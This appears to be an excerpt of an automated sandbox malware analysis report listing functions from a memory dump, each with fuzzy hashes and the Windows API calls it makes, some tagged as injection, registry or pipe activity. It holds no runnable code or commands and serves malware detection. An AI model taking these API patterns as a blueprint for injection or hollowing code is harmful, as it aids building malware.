  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
